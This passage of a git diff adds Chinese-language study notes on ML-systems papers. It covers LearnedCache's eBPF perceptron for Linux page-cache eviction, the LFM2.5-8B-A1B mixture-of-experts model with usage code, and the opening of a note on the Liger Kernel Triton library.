会把磁盘上的文件数据读进内存(RAM),这就是页缓存。下次再读同一个文件时,直接从内存返回,不用再碰磁盘——磁盘比内存慢几十到上百倍,所以这步优化极其重要。但当内存满了,Linux 必须把某些页清出去,这个**决定谁走的规则**就是"淘汰策略"(eviction policy)。Linux 默认用 MGLRU(多 generations 的 LRU 变体)。 + +### 2. eBPF + +eBPF 是 Linux 内核里的一种"沙盒小程序"机制。你可以写一段代码,经过内核自带的验证器(verifier)检查确认"这段代码不会搞坏系统"之后,直接跑在内核的关键路径上。它的特点是**高性能 + 安全**——不像以前改内核模块那样危险。LearnedCache 用 eBPF 把 ML 模型直接塞进了内核的页缓存淘汰流程里。 + +但 eBPF 有两个重大限制: +- 栈大小最多 512 字节 +- **不允许浮点数运算**——所有计算必须用整数 + +### 3. 单层感知机(Single-Layer Perceptron) + +感知机是最简单的"神经网络",只有一个公式: + +``` +得分 = 特征1 × 权重1 + 特征2 × 权重2 + ... + 特征n × 权重n +``` + +你可以把它理解为一个**加权评分表**。每张页(页缓存里的一项数据)有一组特征(比如"上次访问和这次访问隔了多久"),每个特征有权重(模型训练出来的,表示这个特征重要到什么程度)。得分高的表示"很可能很快会被再次访问",得分低的表示"可能暂时不会被用了"。 + +### 4. Bradley-Terry 配对排序 + +LearnedCache 的模型不是直接预测"某个页下次什么时候被访问",而是用 Bradley-Terry 模型做**两两比较**:在两个候选页之间,模型预测"A 比 B 更晚被重用"的概率是多少。 + +公式推导: + +``` +P(A 比 B 更晚被重用) = sigmoid(得分_A - 得分_B) + = sigmoid(w·xA - w·xB) + = sigmoid(w·(xA - xB)) +``` + +其中 xA 和 xB 是两个页的特征向量,w 是感知机的权重向量。因为模型是线性的,最终在部署时不需要做复杂的 sigmoid 运算——只需要给每个页算一个简单得分,然后排序就行了。 + +### 5. 离散化(Discretization) + +原始特征(比如"距离上次访问过了 3.7 秒")是连续值,分布极度偏斜——大部分值集中在 0 附近,少数极端值拖到很远的右边。 + +离散化的做法:按**分位数**把连续值切成 10 个"区间"(bin),每个区间对应一个整数标签。这带来两个好处: +- 数据分布变得均匀,训练更稳定 +- 可以用 one-hot 编码,让模型捕捉非线性关系 + +举例:如果"页面访问时间间隔"被离散化成 10 个 bin,那么"间隔 < 0.1 秒"是 bin 0,"0.1~0.5 秒"是 bin 1,"间隔 > 50 秒"是 bin 9。 + +### 6. ML-at-the-tail 架构 + +LearnedCache 没有完全替换 FIFO,而是用"尾端重排"的方式:先从 FIFO 队列的尾部采样 32 个候选页,然后用 ML 模型给这 32 个页打分,把**得分最低**(预测最不会被重用)的页真正淘汰掉。 + +这样做的原因:全量排序所有缓存页太慢了(O(N log N)),但只评估一小部分候选页,开销几乎可以忽略。 + +## 特征工程 + +LearnedCache 提取了 9 个特征,全部围绕**时间间隔**和**热度**: + +| # | 特征 | 说明 | +|---|------|------| +| 1 | 页面最后两次访问的时间差 | 这张纸上次和上上次被翻,隔了多久 | +| 2 | 页面倒数第二、三次访问的时间差 | 更早之前的访问间隔 | +| 3 | 文件 inode 最后一次访问距今多久 | 整个文件上次被碰,隔了多久 | +| 4 | 文件 inode 倒数第二、三次访问的时间差 | | +| 5 | 文件内的相对访问距离 | 这次读的是文件的第几页,距离上次读的页差多远 | +| 6 | 文件大小(页数) | 文件一共多少页 | +| 7 | 页面的指数移动平均热度 | 每次访问 +1,每秒钟衰减半 | +| 8 | inode 的指数移动平均热度 | 同上,但针对整个文件 | +| 9 | 最后一次访问到被驱逐的时间 | 训练目标:从访问到被踢出缓存过了多久 | + +## 代码示例 + +### 示例 1:训练(Python,scikit-learn) + +```python +from sklearn.linear_model import SGDClassifier +from sklearn.preprocessing import OneHotEncoder +import numpy as np + +# 离散化后的特征:每个特征被 one-hot 编码成多个二元列 +# 假设有 9 个特征,每个 10 个 bin,共 90 列 +X_train = np.random.randint(0, 2, size=(10000, 90)) + +# 标签:两个候选页的配对比较结果 +# y = 1 表示页 A 比页 B 更晚被重用,y = 0 表示页 A 更早被重用 +y_train = np.random.randint(0, 2, size=10000) + +# 单层感知机:本质就是一个带线性核的 SVM +model = SGDClassifier( + loss="modified_huber", # 提供 sigmoid 梯度,用于训练 + max_iter=50, + tol=1e-3, + random_state=42 +) +model.fit(X_train, y_train) + +# 训练完成:model.coef_ 就是权重向量 w +w = model.coef_[0] # 形状为 (90,),每个 bin 对应一个权重 +print(f"权重范围: [{w.min():.3f}, {w.max():.3f}]") +``` + +这段代码训练了一个感知机。关键点:`SGDClassifier` 用随机梯度下降,`loss="modified_huber"` 提供了类似 sigmoid 的梯度函数用于反向传播。训练出来的 `w` 就是后面要嵌入到内核里的权重。 + +### 示例 2:eBPF 部署(C,内核算法核心) + +```c +// eBPF 程序:对每个候选页计算 ML 得分 +#define PROCESS_FEATURE(feat_idx) \ +do { \ + u32 idx = (feat_idx); \ + __u8 *n_bins_ptr = bpf_map_lookup_elem(&n_bins_map, &idx); \ + if (n_bins_ptr) { \ + __u64 (*bin_edges)[MAX_BINS] = bpf_map_lookup_elem(&bin_edges_map, &idx); \ + if (bin_edges) { \ + s64 (*weights)[MAX_BINS] = bpf_map_lookup_elem(&nn_weights_map, &idx); \ + if (weights) { \ + __u8 n_bins = *n_bins_ptr; \ + if (n_bins > 0 && n_bins <= MAX_BINS) { \ + __u8 bin = discretize_feature(raw_features[feat_idx], *bin_edges, n_bins); \ + if (bin >= MAX_BINS) bin = MAX_BINS - 1; \ + score += (*weights)[bin]; \ + } \ + } \ + } \ + } \ +} while (0) + +// 离散化函数:用硬编码的 if-else 链(为了通过 eBPF 验证器) +static inline __u8 discretize_feature(__u64 value, __u64 *bin_edges, __u8 n_bins) { + __u8 n_interior_edges = n_bins - 1; + if (n_interior_edges > 0 && value < bin_edges[0]) return 0; + if (n_interior_edges > 1 && value < bin_edges[1]) return 1; + if (n_interior_edges > 2 && value < bin_edges[2]) return 2; + if (n_interior_edges > 3 && value < bin_edges[3]) return 3; + if (n_interior_edges > 4 && value < bin_edges[4]) return 4; + if (n_interior_edges > 5 && value < bin_edges[5]) return 5; + if (n_interior_edges > 6 && value < bin_edges[6]) return 6; + if (n_interior_edges > 7 && value < bin_edges[7]) return 7; + if (n_interior_edges > 8 && value < bin_edges[8]) return 8; + return n_bins - 1; +} + +// 在淘汰请求中,对每个候选页调用 +int eviction_hook(void *ctx) { + s64 score = 0; + PROCESS_FEATURE(0); // 特征 0: 页面最后两次访问时间差 + PROCESS_FEATURE(1); // 特征 1: 页面倒数第二、三次访问时间差 + PROCESS_FEATURE(2); // 特征 2: 文件 inode 最后一次访问距今 + // ... 更多特征 + // score 就是该页的预测得分,得分越低越应该被淘汰 + return score; +} +``` + +这段 eBPF 代码展示了模型在内核里的实际运行方式:**没有浮点数、没有循环、没有动态内存分配**。权重和 bin 边界通过 eBPF map(一种内核数据结构)从用户态加载,每个特征的处理就是一个"查表 + 累加"的操作。`PROCESS_FEATURE` 用宏定义展开,避免函数调用开销。 + +## 训练结果 + +论文用 Filebench 生成了 6 种模拟工作负载来训练模型,结果如下: + +| 工作负载 | AUC | F1 分数 | +|----------|-----|---------| +| copyfiles | 0.999 | 0.990 | +| webserver | 0.984 | 0.930 | +| webproxy | 0.861 | 0.720 | +| openfiles | 0.823 | 0.720 | +| varmail | 0.682 | 0.650 | +| mongo | 0.661 | 0.650 | + +AUC 接近 80% 意味着模型的排序能力相当不错。copyfiles 和 webserver 这种"读写模式比较规律"的工作负载,模型表现几乎完美。 + +## 内核实测结果 + +论文在 50 轮配对实验中,把 LearnedCache 跟 FIFO 做了对比。核心指标是**插入率**(insertions / accesses,越低表示缓存命中越好): + +| 工作负载 | 相对基线变化 | 是否显著 | +|----------|-------------|---------| +| webproxy | **-9.69%** | 是 (p=6.3×10⁻²¹) | +| copyfiles | **-8.78%** | 是 (p=2.5×10⁻¹⁴) | +| webserver | **-3.76%** | 是 (p=5.5×10⁻³⁰) | +| varmail | -0.08% | 是 (边缘显著) | +| openfiles | +1.02% | 否 | +| mongo | +7.28% | 否(性能下降) | + +webproxy 效果最惊艳——插入率降低了 9.69%,p 值小到 10⁻²¹ 级别,说明这个改善几乎不可能是随机波动造成的。 + +## 关键挑战 + +### eBPF 里不能用浮点数 + +Linux 内核不允许浮点运算,所以所有权重都要**量化成整数**。做法是把浮点权重乘以 10000 再四舍五入到整数。这带来了精度损失,但实验表明影响不大。 + +### eBPF 验证器非常严格 + +循环、动态数组、深层嵌套都可能过不了验证器。LearnedCache 用了**手动展开循环**(hard-coded if-else 链)来确保验证器能静态证明数组访问不会越界。这是工程上非常务实的妥协。 + +### 不是所有工作负载都适用 + +mongo 和 openfiles 上 LearnedCache 甚至不如 FIFO。论文分析:mongo 的访问模式过于随机,模型学不到有效的规律。这说明 ML 淘汰策略**有适用的边界**——访问模式有规律的工作负载才能从中受益。 + +### 权重的可解释性 + +因为模型是线性的 + one-hot 编码,权重本身是**可解释的**。比如 webserver 工作负载中,"文件大小"和"inode 热度"的权重最高——这恰好跟一个基于规则的启发式策略能学到的一样。但在 varmail 和 mongo 上,权重分布很"散",说明这些负载的模式更复杂,简单的线性模型不够用。 + +## 学习要点总结 + +1. **页缓存淘汰策略**不是"选了 LRU 就完事"——不同工作负载有不同的访问模式,一个策略不可能通吃 +2. **ML 可以跑在内核里**,但必须做大量工程妥协:整数化、离散化、无浮点、验证器友好 +3. **eBPF 是连接"灵活策略"和"高性能"的桥梁**——以前加自定义淘汰策略要改内核源码,现在 eBPF 可以热插拔 +4. **模型简单反而更好**——单层感知机就能带来显著改善,复杂模型在 eBPF 的约束下反而不划算 +5. **训练数据必须来自内核**——用户态的 trace 跟内核看到的视角不同,只有内核里的 eBPF tracer 能拿到真实数据 + +## 延伸思考 + +如果感知机就能带来 ~10% 的改善,那深层神经网络呢?在 eBPF 里显然不行(512 字节栈、无浮点、无动态内存),但在类似 cache_ext 这样的框架里,或许可以探索**混合方案**——轻量模型放内核实时推理,重模型放用户态做"二次调优"。这值得进一步研究。 + +--- + +**一句话总结**:LearnedCache 证明了用 eBPF 把训练好的感知机模型放进 Linux 内核页缓存淘汰流程是可行的,在特定工作负载下比 FIFO 少了最多 10% 的不必要磁盘访问——用"预测下次谁会回来"代替"谁来得最早谁就走"。 diff --git a/src/content/docs/papers/lfm2-5-8b-a1b-moe.md b/src/content/docs/papers/lfm2-5-8b-a1b-moe.md new file mode 100644 index 000000000..75256321c --- /dev/null +++ b/src/content/docs/papers/lfm2-5-8b-a1b-moe.md @@ -0,0 +1,300 @@ +--- +title: LFM2.5-8B-A1B — 38T 预训练的边缘 MoE 个人助手 +来源: 'Liquid AI, "LFM2.5-8B-A1B: An Even Better On-Device Mixture of Experts", Liquid AI Blog, 2026; LFM2 Technical Report, arXiv:2511.23404' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:带专家会诊台的随身翻译 + +想象你随身带了一个「小型咨询中心」,墙上挂着 **32 位专科顾问** 的名牌,但规则是:**每回答一个问题,只允许 4 位顾问同时开口**。 + +- 中心名义上拥有 **8B 量级的知识储备**(32 位顾问各自训练过不同领域)。 +- 你每次提问真正消耗的算力,却接近 **1.5B 活跃参数** 的小团队——因为路由器只会点亮 Top-4 专家。 +- 新版 LFM2.5 还换了一本 **128K 页的大记事本**(上下文从 32K 扩到 128K),并且顾问在正式答复前会先写一段 **「思考过程」**(reasoning-only / Chain-of-Thought),再给出最终答案。 + +Liquid AI 在 2026 年 5 月发布的 **LFM2.5-8B-A1B**,名字里的 **8B** 指总参数量级,**A1B** 指每次 forward 大约 **1.5B active parameters**。它把预训练数据从上一代 LFM2-8B-A1B 的 **12T tokens** 扩到 **38T tokens**,目标不是云端巨模型,而是 **笔记本、手机、单卡 GPU 上可本地运行的 Agent 助手**——能链式调用工具、读长文档、且数据不出设备。 + +--- + +## 是什么 + +**LFM2.5-8B-A1B** 是 Liquid AI **LFM2.5** 家族中的 **Mixture-of-Experts(MoE)** 文本模型,面向: + +- **端侧部署**:llama.cpp(GGUF)、MLX(Apple Silicon)、ONNX、vLLM、SGLang 首日支持。 +- **Agent / 工具调用**:BFCL、Tau² 等 agentic 基准上可与更大 MoE 竞争。 +- **长上下文**:**128K** token 窗口,适合整份 PDF、长对话、长工具轨迹。 +- **推理优先输出**:post-trained 版本为 **reasoning-only**,先显式 CoT,再给最终答案。 + +Hugging Face 权重: + +- `LiquidAI/LFM2.5-8B-A1B` — 通用对话 + 推理 + 工具 +- `LiquidAI/LFM2.5-8B-A1B-Base` — 预训练基座,供微调 + +官方推荐采样:`temperature=0.2`,`top_k=80`,`repetition_penalty=1.05`。 + +--- + +## 为什么重要 + +### 1. 稀疏激活把「质量」和「延迟」拆开 + +Dense 8B 模型每 token 都要跑满 8B 参数。MoE 把 **存储(总参数)** 与 **计算(活跃参数)** 解耦:路由器为每个 token 选少量专家,使 **8B 级知识密度** 配上 **~1.5B 级 decode 成本**。LFM2 Technical Report 指出:LFM2-8B-A1B 在约 **1.5B 级延迟** 下可达 **3–4B dense 级质量**——LFM2.5 在此基础上叠加 38T 预训练与 RL。 + +### 2. 38T 预训练 + 针对性 RL,专治小模型的两大顽疾 + +边缘模型参数少,天然 **知识边界窄、爱胡说**。Liquid 的两条 RL 线值得记: + +| 问题 | 手段 | 效果(相对 LFM2-8B-A1B) | +|------|------|---------------------------| +| **幻觉** | avg@k 奖励,鼓励「不知道就说不知道」 | AA-Omniscience **Non-Hallucination Rate** 7.46% → **63.47%** | +| **推理死循环(doom loop)** | 偏好优化 + 惩罚 "Wait…" 等重启词 | 长 CoT 轨迹更稳定 | + +### 3. 128K 与 128K 词表:长文档 + 多语言端侧 + +- **上下文**:先 2T token midtraining 到 32K(推理/数学/工具/长文),再提高 RoPE base θ + 400B token 到 **128K**。 +- **词表**:65K → **128K BPE**(原地扩展,新 embedding 用子词均值初始化),泰语 chars/token **+238%**,印地语 **+120%**,阿拉伯语 **+39%**——同样文本更短、推理更快。 + +### 4. 生态位:本地 Private Agent + +官方 **Localcowork** 演示:单笔记本 + 67 工具 / 13 个 MCP server,无云、无 API Key。LFM2.5 在 M5 Max 上约 **253 tok/s**(<6GB),手机上约 **30 tok/s**——工具 dispatch 亚秒级,适合「问 → 提议 → 确认 → 执行」循环。 + +--- + +## 核心概念 + +### 1. LFM2 混合骨干(Hybrid Backbone) + +LFM2 不是纯 Transformer。经 **hardware-in-the-loop 架构搜索** 得到的最小混合结构: + +| 组件 | 作用 | +|------|------| +| **Gated short convolution(LIV 块)** | 局部、输入感知的短程依赖;18/24 层为 double-gated LIV | +| **GQA(Grouped-Query Attention)** | 6/24 层;KV head 共享,省 KV cache 显存 | +| **MoE SwiGLU FFN** | 32 experts,**Top-4** / token;前 2 层保持 dense 稳定训练 | + +LFM2-8B-A1B 规格(LFM2.5 沿用同一骨架):24 层,`d_model=2048`,32 query heads / 8 KV heads,MoE `FF=1792` × 32 experts。 + +### 2. MoE 路由与 A1B 命名 + +每个 token 经过 **sigmoid router + adaptive routing bias**(DeepSeek 式负载均衡),选 **4/32** 专家。总参 **8.3B**,活跃约 **1.5B**——社区简写 **8B-A1B**(Active ~1B 量级四舍五入)。 + +直觉:**专家 = 不同「子网络技能包」**;路由 = **按 token 动态组队**。 + +### 3. Reasoning-only:先想后答 + +LFM2.5 post-trained 版 **强制** 输出 CoT 再答。MoE 在 compute-bound 场景下,**多写几个思考 token 的边际成本很低**(仍只激活 1.5B),因此用「多想几步」换 IFEval、MATH、Agent 任务上的质量——IFEval **79.44 → 91.84**(对比 LFM2-8B-A1B)。 + +### 4. 训练流水线(38T 从哪来) + +```text +[LFM2-8B-A1B 基座] + → 词表扩展 65K→128K(embedding 适配 + continued pretrain) + → 大规模 continued pretrain(累计至 ~38T tokens 规模) + → 2T midtraining:32K 上下文(推理/数学/工具/长文档) + → 400B midtraining:RoPE θ 调整 → 128K + → RL:幻觉 avg@k、doom loop 偏好优化、指令/Agent 对齐 + → LFM2.5-8B-A1B +``` + +**38T** 是相对上一代 **12T** 的预训练规模跃迁;exact 数据 mix 未完全公开,但官方强调 **tool-use、长轨迹、多语言** 比重上升。 + +### 5. 与相近模型对比(官方博客摘录) + +| 模型 | 总/活跃参数 | IFEval | MATH500 | BFCLv3 | Tau² Telecom | +|------|-------------|--------|---------|--------|--------------| +| **LFM2.5-8B-A1B** | 8B / 1.5B | **91.84** | **88.76** | **64.79** | **88.07** | +| Granite-4.0-H-Tiny | 7B / 1B | 82.23 | 59.20 | 56.89 | 16.67 | +| Qwen3-30B-A3B-Thinking | 30.5B / 3.3B | 90.82 | 86.48 | 73.39 | 21.93 | +| Gemma-4-26B-A4B-IT | 26B / 4B | 91.40 | 94.20 | 68.87 | 42.11 | + +小激活参数量下,**指令遵循 + 电信 Agent 场景** 表现突出;数学上 Qwen3-30B-A3B 仍更强,但 LFM2.5 的 **吞吐与端侧 footprint** 是差异化卖点。 + +### 6. 部署格式选型 + +| 格式 | 场景 | +|------|------| +| 原生 HF / vLLM / SGLang | GPU 服务、微调 | +| GGUF + llama.cpp | CPU / 跨平台边缘 | +| MLX | Mac Apple Silicon | +| ONNX | 跨加速器推理 | + +--- + +## 代码示例 1:Transformers 本地对话(官方 Quick Start) + +需要 `transformers>=5.0.0`,GPU 上可开 `flash_attention_2`。 + +```python +from transformers import AutoModelForCausalLM, AutoTokenizer, TextStreamer + +model_id = "LiquidAI/LFM2.5-8B-A1B" + +model = AutoModelForCausalLM.from_pretrained( + model_id, + device_map="auto", + dtype="bfloat16", + # attn_implementation="flash_attention_2", # 兼容 GPU 可取消注释 +) +tokenizer = AutoTokenizer.from_pretrained(model_id) +streamer = TextStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True) + +messages = [ + {"role": "user", "content": "用三句话解释 Mixture-of-Experts 为什么适合端侧 Agent。"} +] + +input_ids = tokenizer.apply_chat_template( + messages, + add_generation_prompt=True, + return_tensors="pt", + tokenize=True, +).to(model.device) + +output = model.generate( + input_ids, + do_sample=True, + temperature=0.2, + top_k=80, + repetition_penalty=1.05, + max_new_tokens=2048, + streamer=streamer, +) +``` + +**观察要点**:输出里通常会先出现 **思考/推理段落**,再给出精简结论——这是 reasoning-only 训练的结果,解析下游答案时可能需要按模板切分 CoT 与 final answer。 + +--- + +## 代码示例 2:结构化工具调用(Agent 最小闭环) + +LFM2.5 强调 **native tool calling**。下面用 OpenAI 兼容的 `tools` 字段演示「查天气 → 模型决定是否调用函数」——实际 schema 以 tokenizer chat template 为准;生产环境建议直接用 Liquid 文档中的 tool 模板或 vLLM tool parser。 + +```python +import json +from transformers import AutoModelForCausalLM, AutoTokenizer + +model_id = "LiquidAI/LFM2.5-8B-A1B" +model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto", dtype="bfloat16") +tokenizer = AutoTokenizer.from_pretrained(model_id) + +tools = [ + { + "type": "function", + "function": { + "name": "get_weather", + "description": "查询指定城市的当前天气", + "parameters": { + "type": "object", + "properties": { + "city": {"type": "string", "description": "城市名,如 Shanghai"}, + "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, + }, + "required": ["city"], + }, + }, + } +] + +def fake_get_weather(city: str, unit: str = "celsius") -> dict: + return {"city": city, "temp": 26, "unit": unit, "condition": "cloudy"} + +messages = [ + {"role": "user", "content": "上海现在天气怎么样?如果需要工具就调用。"}, +] + +# 多数 Liquid chat template 支持 tools= 参数(以当前 tokenizer 文档为准) +prompt_ids = tokenizer.apply_chat_template( + messages, + tools=tools, + add_generation_prompt=True, + return_tensors="pt", + tokenize=True, +).to(model.device) + +generated = model.generate( + prompt_ids, + max_new_tokens=512, + temperature=0.2, + top_k=80, + repetition_penalty=1.05, +) +text = tokenizer.decode(generated[0], skip_special_tokens=True) +print(text) + +# 若模型输出 function call,解析后执行并回灌(第二轮) +# observation = fake_get_weather("Shanghai") +# messages += [{"role": "assistant", "content": text}, +# {"role": "tool", "name": "get_weather", "content": json.dumps(observation)}] +# ... 再次 apply_chat_template + generate +``` + +**Agent 设计提示**: + +1. **128K 上下文** 可塞入较长 tool 文档 + 多轮轨迹,但仍应做 observation 摘要,避免噪音淹没路由。 +2. 小模型 **知识边界** 有限——对 factual QA 应配合检索或允许模型 **拒答**(RL 已强化 abstention)。 +3. 链式工具调用时监控 **doom loop**;若出现反复 "Wait…",降低 `max_new_tokens` 或加 stop sequences。 + +--- + +## 代码示例 3:llama.cpp 量化推理(边缘 CPU) + +适合无独显笔记本;需先下载 `LFM2.5-8B-A1B-GGUF`。 + +```bash +# 示例:Q4_K_M 量化,交互式 chat +./llama-cli \ + -m LFM2.5-8B-A1B-Q4_K_M.gguf \ + -c 8192 \ + --temp 0.2 \ + --top-k 80 \ + --repeat-penalty 1.05 \ + -p "你好,请用一句话介绍 LFM2.5 MoE。" +``` + +`-c` 为上下文槽位;要跑满 128K 需更大 RAM 并提高 `-c`(实际受机器内存限制)。官方称 entry-level laptop 仍可舒适运行。 + +--- + +## 零基础心智模型:读名字、读基准、读部署 + +1. **LFM2.5-8B-A1B** = Liquid 第 2.5 代、8B 总参数、约 1.5B 激活的 MoE。 +2. **38T tokens** = 相对 12T 的预训练扩容,是能力跃迁的主因之一(外加 RL 与 128K midtraining)。 +3. **128K + tool calling + reasoning** = 面向 **本地 Agent**,不是单纯聊天 Bot。 +4. **选模型**:要微调用 Base;要开箱 Agent 用 post-trained;要 Mac 本地优先试 MLX/GGUF。 + +--- + +## 局限与使用注意 + +| 风险 | 说明 | +|------|------| +| **知识上限** | 8B 级 MoE 仍会在冷门事实上幻觉;应依赖 RAG 或接受拒答 | +| **CoT 开销** | reasoning-only 增加输出 token 数;虽单 token 便宜,但总延迟仍随 CoT 长度上升 | +| **MoE 实现** | 需框架支持稀疏路由;错误实现可能退化为慢速 dense | +| **多语言** | 词表改进不等于文化/事实对齐;低资源语言仍需谨慎评测 | +| **训练成本** | 38T 预训练碳足迹大;端侧收益是推理阶段私有化,不是训练环保 | + +--- + +## 与相关工作的关系 + +- **LFM2 Technical Report(arXiv:2511.23404)**:给出 hybrid backbone、MoE 32×Top-4、硬件协同搜索的完整规格——读 LFM2.5 前先读 LFM2 一节即可建立架构直觉。 +- **DeepSeek-V2/V3 式 MoE 路由**:负载均衡 bias、sigmoid gate 属同一族稀疏 FFN 设计。 +- **Qwen3 / Gemma 4 小 MoE**:同赛道对比对象;LFM2.5 差异化在 **Liquid 卷积混合层 + 端侧吞吐优化 + LEAP 移动端栈**。 + +--- + +## 进一步阅读 + +- [Liquid AI 发布博客](https://www.liquid.ai/blog/lfm2-5-8b-a1b) +- [官方模型文档](https://docs.liquid.ai/lfm/models/lfm25-8b-a1b) +- [Hugging Face: LiquidAI/LFM2.5-8B-A1B](https://huggingface.co/LiquidAI/LFM2.5-8B-A1B) +- [LFM2 Technical Report (arXiv:2511.23404)](https://arxiv.org/html/2511.23404) + +--- + +## 小结 + +**LFM2.5-8B-A1B** 把 **MoE 稀疏计算**、**38T 规模预训练**、**128K 长上下文** 和 **面向 Agent 的 RL** 打包成可本地部署的 open-weight 模型:名义 8B 知识、约 1.5B 激活算力、强调工具链式调用与低幻觉拒答。对零基础学习者,记住一句话即可:**它是为「躺在你笔记本里的私人 Agent」设计的 MoE,而不是为数据中心峰值榜设计的巨模型。** diff --git a/src/content/docs/papers/liger-kernel-llm-training.md b/src/content/docs/papers/liger-kernel-llm-training.md new file mode 100644 index 000000000..c1476dab8 --- /dev/null +++ b/src/content/docs/papers/liger-kernel-llm-training.md @@ -0,0 +1,328 @@ +--- +title: Liger Kernel — 面向 LLM 训练的高效 Triton Kernel 套件 +来源: https://arxiv.org/abs/2410.10989 +日期: 2026-06-13 +子分类: ML 系统 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:FlashAttention 修好了高速公路,Liger 把收费站也拆了 + +训练大语言模型(LLM)时,很多人已经知道 [[flash-attention]] / [[flashattention-2]]:它像把 attention 这条**最堵的高速公路**改成了单行隧道——不再把整张 N×N 分数表写进显存,吞吐立刻上去。 + +但车开完全程,还要过一堆**小收费站**:RMSNorm、RoPE、SwiGLU、最后的 Linear + CrossEntropy……每个站都要: + +1. 把数据从 GPU 显存(HBM)搬进片上 SRAM; +2. 算完; +3. 再搬回 HBM; +4. 有时还要**额外租一块巨大的临时仓库**(比如 vocab=256k 时的 logits 张量)。 + +LinkedIn 在 2024 年开源的 **Liger Kernel**([arXiv:2410.10989](https://arxiv.org/abs/2410.10989),[GitHub](https://github.com/linkedin/Liger-Kernel))干的事,就是把这些「小收费站」也用 [[triton-llm]] 重写成**融合 kernel**: + +- **算子融合(kernel fusion)**:多步合成一次 GPU launch,少来回搬货。 +- **原地梯度(in-place gradient)**:算完直接把输入缓冲区覆写成梯度,不另开一张大表。 +- **分块计算(input chunking)**:尤其是最后一层 `Linear + CrossEntropy`,按 chunk 流式投影,**永远不把完整 logits 物化出来**。 + +论文与官方 benchmark 的典型收益(相对 Hugging Face 默认实现): + +| 指标 | 典型提升 | +|------|----------| +| 多卡训练吞吐 | 平均约 **+20%**(Llama3-8B 微调最高约 **+42.8%**) | +| GPU 峰值显存 | 平均约 **-60%**(部分模型 batch 可到原来 2× 以上) | +| 单 kernel | CrossEntropy 约 **3×** 更快、**5×** 更省显存;RMSNorm 约 **7×** 更快 | + +依赖极简:只要 **PyTorch + Triton**,能与 FlashAttention、FSDP、DeepSpeed ZeRO / ZeRO++ 共存。 + +--- + +## 是什么 + +**Liger Kernel: Efficient Triton Kernels for LLM Training**(Pin-Lun Hsu 等,LinkedIn,2024 年 10 月 arXiv,2025 年 ICML CODEML workshop)是一套**专为 LLM 训练定制的 Triton GPU kernel 库**,不是新模型架构,而是**替换训练路径上的「慢且费显存」算子实现**。 + +| 项目 | 内容 | +|------|------| +| 作者团队 | Pin-Lun Hsu, Yun Dai, Vignesh Kothapalli 等(LinkedIn) | +| 实现语言 | [Triton](https://github.com/triton-lang/triton)(见 [[triton-2019]]) | +| 覆盖算子 | RMSNorm、LayerNorm、RoPE、SwiGLU、GeGLU、CrossEntropy、**FusedLinearCrossEntropy (FLCE)** 等 | +| 后训练扩展 | DPO、ORPO、CPO、SimPO、JSD 等 alignment / distillation loss 的融合 kernel | +| 集成方式 | Hugging Face `Trainer` / TRL `SFTTrainer`、Axolotl、LLaMA-Factory 等,常只需 `use_liger=True` | +| 许可证 | 宽松开源(BSD-2-Clause) | + +一句话:**FlashAttention 优化 attention;Liger 优化 attention 之外、每层都会跑、且常被忽视的「配角算子 + 损失层」。** + +--- + +## 为什么重要 + +### 1. 大词表时代的显存杀手:logits 张量 + +现代 LLM 词表动辄 128k–256k。最后一层要把 hidden state `H ∈ R^{B×T×d}` 投影成 `logits ∈ R^{B×T×V}`。 + +以 Gemma 为例(论文数字):单卡、`batch=8`、`seq=4096`、`V=256k`、bf16 时,**仅 logits 就要约 16.8 GB**。而训练峰值显存往往出现在 forward 末尾、backward 释放 activation 之前——**这一块直接把 batch size 和 context length 卡死**。 + +Liger 的 **FusedLinearCrossEntropy (FLCE)** 从不物化完整 logits,是整套库最具「质变感」的 kernel。 + +### 2. 训练栈的「第二梯队」瓶颈 + +在 attention 已被 FlashAttention 优化后,profiler 上常见剩余热点: + +- 每层一次的 **RMSNorm / RoPE**(launch 开销 + 内存带宽); +- **SwiGLU / GeGLU** FFN(前向要存中间激活,反向占显存); +- **CrossEntropy**(softmax + log + 大 vocab 临时缓冲)。 + +这些算子单次不算最贵,但**层数 × 步数**累积后,足以吃掉 10–20% 端到端时间,并抬高峰值显存。 + +### 3. 低门槛、可组合 + +新手:`apply_liger_kernel_to_llama(model)` 或 `use_liger=True` 一行启用。 + +进阶:单独 import `LigerRMSNorm`、`LigerFusedLinearCrossEntropyLoss` 拼自定义模型。 + +这与 [[triton-llm]] 倡导的「tile 级 DSL + autotune」路线一致,降低了写高性能 kernel 的门槛。 + +--- + +## 核心概念 + +### 1. Kernel 融合(Operator Fusion) + +PyTorch 默认路径里,一个「逻辑操作」往往对应**多个 CUDA kernel launch**,每 launch 一次就要完整读写一遍 HBM。 + +Liger 把例如 RMSNorm 的「求 RMS → 归一化 → 乘 γ」合成**单个 Triton kernel**;前向时缓存 RMS 等统计量供反向使用,避免重复扫描张量。 + +类比:原本「称重 → 贴标签 → 打包」三道工序各跑一趟仓库;融合后**一条流水线干完**。 + +### 2. 原地梯度(In-place Gradient Replacement) + +CrossEntropy 的梯度对 logits 有简洁闭式: + +``` +∇_x L = softmax(x) − one_hot(target) +``` + +Liger CE kernel 在 forward 里就算出该梯度,并**直接写回原来存放 logits 的缓冲区**,不再同时保留「logits + grad_logits」两份大数组。 + +配合 **online softmax**(流式维护 max 与 sum,不物化完整 softmax 向量),进一步省显存、提速度。 + +### 3. Fused Linear Cross Entropy(FLCE)与分块 + +标准训练最后两步: + +``` +logits = H @ W^T # H: (B·T, d), W: (V, d) → logits (B·T, V) +loss = CrossEntropy(logits, targets) +``` + +FLCE 把两步合并,并对 `H` **按 chunk 切片**: + +``` +for each chunk h of H: + x = h @ W^T # 只物化 (chunk_size, V) 的 logits + partial_loss, ∇x = CE(x, targets_chunk) + accumulate ∇h, ∇W +``` + +chunk size 按 `BT`、隐藏维 `H`、词表 `V` 动态选取,在**显存峰值**与 **GPU 利用率**之间折中。论文给出启发式:接近 hidden dim 时常更平衡。 + +对 **Medusa** 等多解码头训练尤其关键:每个头都要投影到 vocab,若各物化一份 logits 极易 OOM;FLCE 让多头顶训练可行。 + +### 4. 反向重计算(Recomputation in Backward) + +SwiGLU / GeGLU 前向要算 `SiLU(x₁) ⊙ x₂`(或 GELU 变体)。默认实现为反向保存 `SiLU(x₁)` 等中间结果。 + +Liger 在 backward **用存下来的 x₁、x₂ 重算激活**,以额外算力换显存(与 checkpointing 